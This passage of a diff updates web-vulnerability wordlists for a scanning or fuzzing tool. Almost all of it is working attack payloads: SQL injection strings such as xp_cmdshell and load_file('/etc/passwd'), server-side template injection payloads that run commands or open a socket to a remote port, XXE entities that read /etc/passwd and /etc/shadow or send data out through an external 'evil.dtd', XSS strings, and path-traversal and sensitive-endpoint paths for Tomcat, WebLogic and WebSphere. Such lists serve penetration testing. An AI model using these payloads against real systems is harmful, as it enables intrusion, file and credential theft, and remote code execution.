+pg_sleep(__TIME__)--
 procedure
 replace
 select
+ select * from information_schema.tables--
+ select name from syscolumns where id = (sele ...
+sqlvuln
+sqlvuln;
+t'exec master..xp_cmdshell 'nslookup www.googl ...
 t'exec master..xp_cmdshell 'nslookup www.google.com'--
 to_timestamp_tz
 truncate
 tz_offset
+uni/**/on sel/**/ect
+ union all select @@version--
+ union select
+ union select 1,load_file('/etc/passwd'),1,1,1;
+ union select * from users where login = char ...
 update
+x' AND 1=(SELECT COUNT(*) FROM tabname); --
+x' AND email IS NULL; --
+x' AND members.email IS NULL; --
+x' AND userid IS NULL; --
+x' OR full_name LIKE '%Bob%
 x' or 1=1 or 'x'='y
 |
-1e100
-2 or 2=2
-2' or '2'='2
-999999999999999999
-" or 1=1#
-#mysql
-'
-'#mysql
-'/*ora_mysql*/and/**/'2'='0
-'/*ora_mysql*/and/**/'2'='2
-'/*ora_mysql*/or/**/'2'='2
-' and '2'='0
-' and '2'='0'#mysql
-' and '2'='0'-- oracle
-' and '2'='2
-' and '2'='2'#mysql
-' and '2'='2'-- oracle
-' or 1=1--
-' or '2'='2
-'test
-'test--
--ora_sqls
-/*ora_mysql*/and/**/2=0
-/*ora_mysql*/and/**/2=2
-admin'
-admin'#
-admin'--
- and 1=1
- and 2=0
- and 2=0#mysql
- and 2=0-- oracle_mysql
- and 2=2#mysql
- and 2=2-- oracle_mysql
- and USER=USER
- and user()=user()
-now()
-or 1=1
-or 1=1#
-or 1=1--
- or 2=2
-order by 1--
+||6
+||'6
+||(elt(-3+5,bin(15),ord(10),hex(char(45))))
+||UTL_HTTP.REQUEST
+Ã½ or 1=1 --
+â or 1=1 --
+â or 3=3 --
--- a/wordlists/vulnerabilities/ssti.txt
+++ b/wordlists/vulnerabilities/ssti.txt
@@ -1,10 +1,19 @@
+42*42
+#{ 3 * 3 }
 #{3*3}
 #{ 7 * 7 }
+#{7*7}
+#{42*42}
 ${3*3}
+${6*6}
+${7*7}
+${42*42}
 ${"freemarker.template.utility.Execute"?new()("id")}
 ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
 ${T(java.lang.System).getenv()}
+${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
 ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}${self.module.cache.util.os.system("id")}
+${donotexists|42*42}
 ${self.__init__.__globals__['util'].os.system('id')}
 ${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")}
 ${self.attr._NSAttr__parent.module.cache.util.os.system("id")}
@@ -58,22 +67,42 @@ ${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")}
 ${self.template.module.runtime.exceptions.util.os.system("id")}
 ${self.template.module.runtime.util.compat.inspect.os.system("id")}
 ${self.template.module.runtime.util.os.system("id")}
+${{3*3}}
 ${{7*7}}
+${{<%[%'"}}%\
+*{7*7}
+*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
 <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
+<%= 3 * 3 %>
 <%= 7 * 7 %>
+<%= 7*7 %>
+<%=42*42 %>
 <%= File.open('/etc/passwd').read %>
@(1+2)
+@(6+5)
+[7*7]
 [#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
+[[${42*42}]]
+{42*42}
 {$smarty.version}
 {% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
+{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"/etc/passwd\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
+{^xyzm42}1764{/xyzm42}
 {php}echo `id`;{/php}
+{{2*2}}[[3*3]]
+{{3*3}}
+{{3*'3'}}
 {{4*4}}[[5*5]]
 {{7*7}}
+{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
 {{7*'7'}}
+{{42*42}}
+{{''.__class__.__base__.__subclasses__()[227]('cat /etc/passwd', shell=True, stdout=-1).communicate()}}
 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
 {{ ''.__class__.__mro__[2].__subclasses__() }}
+{{''.__class__.mro()[1].__subclasses__()[396]('cat /etc/passwd',shell=True,stdout=-1).communicate()[0].strip()}}
 {{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
 {{''.class.mro()[1].subclasses()}}
 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
@@ -81,6 +110,7 @@ ${{7*7}}
 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
 {{'a'.toUpperCase()}}
+{{=42*42}}
 {{['cat$IFS/etc/passwd']|filter('system')}}
 {{['cat\x20/etc/passwd']|filter('system')}}
 {{['id']|filter('system')}}
@@ -105,3 +135,4 @@ ${{7*7}}
 {{self._TemplateReference__context.joiner.__init__.__globals__.os}}
 {{self._TemplateReference__context.namespace.__init__.__globals__.os}}
 {{self}}
+{{{42*42}}}
--- a/wordlists/vulnerabilities/tomcat.txt
+++ b/wordlists/vulnerabilities/tomcat.txt
@@ -4,6 +4,9 @@ balancer
 dav
 deploy
 examples
+examples/%2e%2e/manager/html
+examples/%252e%252e/manager/html
+examples/../manager/html
 examples/jsp/index.html
 examples/jsp/snp/snoop.jsp
 examples/jsp/source.jsp
--- a/wordlists/vulnerabilities/weblogic.txt
+++ b/wordlists/vulnerabilities/weblogic.txt
@@ -1,8 +1,3 @@
-#HTTPClntRecv
-#bea_wls_internal/HTTPClntRecv
-#bea_wls_internal/HTTPClntRecv/*
-#bea_wls_internal/iiop/ClientRecv
-#bea_wls_internal/iiop/ClientRecv/*
 *
 *.gif
 *.gif/
@@ -39,6 +34,7 @@ HTTPClntClose
 HTTPClntClose/*
 HTTPClntLogin
 HTTPClntLogin/*
+HTTPClntRecv
 HTTPClntRecv/*
 HTTPClntSend
 HTTPClntSend/*
@@ -66,6 +62,7 @@ WebServiceServlet
 _async
 _async/*
 _async/AsyncResponseService
+_async/AsyncResponseService
 _async/AsyncResponseServiceHttps
 _async/AsyncResponseServiceJms
 _async/AsyncResponseServiceSoap12
@@ -80,6 +77,7 @@ actions
 admin/login.do
 applet
 applications
+appmanager
 appmanager/*
 asyncServlet
 asyncServlet/main.jsp
@@ -110,13 +108,14 @@ bea_wls_internal/HTTPClntClose
 bea_wls_internal/HTTPClntClose/*
 bea_wls_internal/HTTPClntLogin
 bea_wls_internal/HTTPClntLogin/*
+bea_wls_internal/HTTPClntRecv
+bea_wls_internal/HTTPClntRecv/*
 bea_wls_internal/HTTPClntSend
 bea_wls_internal/HTTPClntSend/*
 bea_wls_internal/WLDummyInitJVMIDs
 bea_wls_internal/WebServiceServlet
 bea_wls_internal/a2e2gp2r2/x.jsp
 bea_wls_internal/classes/
-bea_wls_internal/classes/ 
 bea_wls_internal/classes/*
 bea_wls_internal/classes/META-INF/MANIFEST.MF
 bea_wls_internal/com/*
@@ -126,6 +125,8 @@ bea_wls_internal/iiop/ClientClose
 bea_wls_internal/iiop/ClientClose/*
 bea_wls_internal/iiop/ClientLogin
 bea_wls_internal/iiop/ClientLogin/*
+bea_wls_internal/iiop/ClientRecv
+bea_wls_internal/iiop/ClientRecv/*
 bea_wls_internal/iiop/ClientSend
 bea_wls_internal/iiop/ClientSend/*
 bea_wls_internal/psquare/x.jsp
@@ -327,6 +328,7 @@ weblogic.testclient.CallbackHandler
 weblogic.wsee.async.AsyncResponseBean
 weblogic.wsee.async.AsyncResponseBeanSoap12
 weblogic.xml
+weblogic/ready
 webservice
 webservicesJwsSimpleEar
 webshare
@@ -341,6 +343,14 @@ wl_management_internal2/Bootstrap
 wl_management_internal2/FileDistribution
 wl_management_internal2/wl_management
 wliconsole
+wls-wsat/CoordinatorPortType
+wls-wsat/CoordinatorPortType11
+wls-wsat/ParticipantPortType
+wls-wsat/ParticipantPortType11
+wls-wsat/RegistrationPortTypeRPC
+wls-wsat/RegistrationPortTypeRPC11
+wls-wsat/RegistrationRequesterPortType
+wls-wsat/RegistrationRequesterPortType11
 wls_utc
 wls_utc4
 wls_utc/*.do
--- a/wordlists/vulnerabilities/websphere.txt
+++ b/wordlists/vulnerabilities/websphere.txt
@@ -47,7 +47,6 @@ DynaCacheESI/esiInavlidator
 DynamicQuery/EmployeeFinder
 DynamicQuery/EmployeeFinder/*
 DynamicQuery/docs/*
-ErrorPageApp
 ErrorReporter
 ErrorServlet
 FileTransfer
@@ -80,7 +79,6 @@ HitCount.jsp
 IBMDefaultErrorReporter
 IBMWebAS
 IBM_WS_SYS_RESPONSESERVLET
-IBM_WS_SYS_RESPONSESERVLET/*
 ISCAdminPortlet
 JTAExtensionsSamples/TransactionTracker
 JTAExtensionsSamples/TransactionTracker/*
@@ -89,7 +87,6 @@ MANIFEST.MF
 META-INF
 MessageDrivenBeans/docs/*
 MessageDrivenBeans/docsservlet/*
-MessageMigrationUtility
 OrderProcessorEJB/*
 OrderProcessorEJB/*.jsp
 OrderProcessorEJB/*.jsv
@@ -211,7 +208,6 @@ WebSphereSamples/
 WebSphereSamples/SingleSamples/AccountAndTransfer/create.html
 WebSphereSamples/SingleSamples/Increment/increment.html
 WebSphereSamples/YourCo/main.html
-WebSphereTPHosts
 _DynaCacheEsi
 _DynaCacheEsi/*
 _DynaCacheEsi/esiInvalidator
@@ -231,7 +227,6 @@ apadminred.html
 aphtpasswd.html
 asynchbeans/*
 asynchbeans/docs/*
-auth_error.jsp
 cachemonitor
 cachemonitor/statistics.jsp
 cell.xml
@@ -244,7 +239,6 @@ config
 console
 contentapi
 debug_error.jsp
-ejb3sample/
 enabler
 error
 error.jsp
@@ -271,10 +265,8 @@ index.html
 index.jsp
 ivt
 ivt/*
-ivt/ivtAddition.jsp
 ivt/ivtDate.jsp
 ivt/ivtejb
-ivt/ivtserver
 ivt/ivtservler
 ivt/ivtservlet
 ivtejb
@@ -291,7 +283,9 @@ lwp/templatelibraryExport
 lwp/typeAhead
 manual
 manual/index.html
-nb
+mycontenthandler/
+mycontenthandler/wcmrest/
+mycontenthandler/wcmrest/Project
 node.xml
 nodes
 opc/*.jsp
@@ -304,11 +298,9 @@ opc/services/OrderTrackingIntfPort/wsdl/*
 opc/services/PurchaseOrderIntfPort
 opc/services/PurchaseOrderIntfPort/wsdl/*
 opt
-otis
 petstore
 petstore/*
 ping
-prm
 removeNodeListener
 replication
 resources.xml
@@ -333,7 +325,6 @@ servlet
 servlet/*
 servlet/ControllerServlet
 servlet/ErrorReporter
-servlet/HelloPervasiveServlet
 servlet/HelloWorldServlet
 servlet/HitCount
 servlet/SimpleServlet
@@ -349,51 +340,25 @@ servlet/com.ibm.servlet.engine.webapp.InvokerServlet
 servlet/com.ibm.servlet.engine.webapp.SimpleFileServlet
 servlet/com.ibm.servlet.engine.webapp.UncaughtServletException
 servlet/com.ibm.servlet.engine.webapp.WebAppErrorReport
-servlet/com.ibm.websphere.management.wsdm.jaxws.AppServiceGroupService
-servlet/com.ibm.websphere.management.wsdm.jaxws.ApplicationServerService
-servlet/com.ibm.websphere.management.wsdm.jaxws.ApplicationService
-servlet/com.ibm.websphere.management.wsdm.jaxws.DataSourceService
-servlet/com.ibm.websphere.management.wsdm.jaxws.DomainResourcesServiceGroupService
-servlet/com.ibm.websphere.management.wsdm.jaxws.EJBService
-servlet/com.ibm.websphere.management.wsdm.jaxws.J2EEFactoryService
-servlet/com.ibm.websphere.management.wsdm.jaxws.JVMService
-servlet/com.ibm.websphere.management.wsdm.jaxws.JaxrpcWebServiceService
-servlet/com.ibm.websphere.management.wsdm.jaxws.JaxwsWebServiceService
-servlet/com.ibm.websphere.management.wsdm.jaxws.ServiceGroupService
-servlet/com.ibm.websphere.management.wsdm.jaxws.ServletService
-servlet/com.ibm.websphere.management.wsdm.jaxws.WebServiceService
-servlet/com.ibm.websphere.management.wsdm.jaxws.WebSphereClusterService
-servlet/com.ibm.websphere.management.wsdm.jaxws.WebSphereDomainService
-servlet/com.ibm.ws.websvcs.transport.http.AsyncResponseServlet
 servlet/hello
-servlet/ivtEJBClient
-servlet/ivtServer
-servlet/ivtServlet
-servlet/java.lang.Throwable
 servlet/snoop
 servlet/snoop2
 servletcache
 showCfg
 sibstatus
-sibws
 simple.jsp
 simpleJSP
-sm
 snoop
 snoop2
 snoop/*
-soaphttp
 statistics.jsp
 status
 statuspoll
 theme
 tradetheme
 transfer
-uddigui
 uddigui/*
-uddisoap
 uddisoap/*
-uddiv3soap
 variables.xml
 very_simple.jsp
 virtualhosts.xml
@@ -402,6 +367,7 @@ wasPerfTool/*
 wasPerfToolservlet
 wasPerfToolservlet/*
 wasportlet
+wcmrest/
 web.xml
 webapp
 webapp/examples/ErrorServlet
@@ -415,23 +381,6 @@ webapp/examples/showcfg
 webapp/examples/simple.jsp
 webapp/examples/verify
 webexec
-websphere-management
-websphere-management/services/application
-websphere-management/services/application-service-group
-websphere-management/services/applicationserver
-websphere-management/services/datasource
-websphere-management/services/domain-resources-service-group
-websphere-management/services/ejb
-websphere-management/services/factory
-websphere-management/services/jaxrpcwebservices
-websphere-management/services/jaxwswebservices
-websphere-management/services/jvm
-websphere-management/services/service-group
-websphere-management/services/servlet
-websphere-management/services/vm-service-group
-websphere-management/services/webservices
-websphere-management/services/webspherecluster
-websphere-management/services/webspheredomain
 wim
 workarea/*
 workarea/docs/*
@@ -555,7 +504,16 @@ wps/wcmimport
 wps/wcmsearchseed
 wps/wprs
 wps/wsdl/*
+wps/wsrp/WSRPBaseService_v2
+wps/wsrp/WSRPBaseService_v2/*
+wps/wsrp/WSRPPortletManagementService
+wps/wsrp/WSRPPortletManagementService/*
+wps/wsrp/WSRPPortletManagementService_v2
+wps/wsrp/WSRPPortletManagementService_v2/*
+wps/wsrp/WSRPServiceDescriptionService
+wps/wsrp/WSRPServiceDescriptionService/*
+wps/wsrp/WSRPServiceDescriptionService_v2
+wps/wsrp/WSRPServiceDescriptionService_v2/*
+wps/wsrp/WsrpProxyPortlet
 wps_semanticTag
-wsgwsoaphttp1
-wsgwsoaphttp2
 wsrp
--- a/wordlists/vulnerabilities/xml.txt
+++ b/wordlists/vulnerabilities/xml.txt
@@ -1,15 +0,0 @@
-<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
-<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
-<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
-<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
-<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>
-<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>
-<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
-<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
-<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
-<name>','')); phpinfo(); exit;/*</name>
-<xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
-<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
-<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
-count(/child::node())
-x' or name()='username' or 'x'='y
--- a/wordlists/vulnerabilities/xss.txt
+++ b/wordlists/vulnerabilities/xss.txt
--- a/wordlists/vulnerabilities/xxe.txt
+++ b/wordlists/vulnerabilities/xxe.txt
@@ -0,0 +1,51 @@
+%foo;
+&foo;
+<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]>
+<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
+<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
+<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
+<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com/text.txt" >]>
+<!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///c:/boot.ini"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]>
+<!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///etc/issue"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]>
+<!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]>
+<!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root>
+<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://127.0.0.1:80/?%file;'>  "> %int;
+<!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'ftp://127.0.0.1:21/%data3;'>">
+<!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd" >
+<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
+<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
+<![CDATA[<test></test>]]>
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]><foo>&xxe;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com:80" >]><foo>&xxe;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example:443" >]>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root>
+<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><test></test>
+<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
+<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
+<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
+<foo><![CDATA[' or 1=1 or ''=']]></foo>
+<foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
+<name>','')); phpinfo(); exit;/*</name>
+<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
+<test></test>
+<xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
+<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
+<xml SRC="xsstest.xml" ID=I></xml>
+<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><script>alert(123)</script></xsl:template></xsl:stylesheet>
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:copy-of select="document('/etc/passwd')"/></xsl:template></xsl:stylesheet>
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:value-of select="php:function('passthru','ls -la')"/></xsl:template></xsl:stylesheet>
+count(/child::node())
+x' or name()='username' or 'x'='y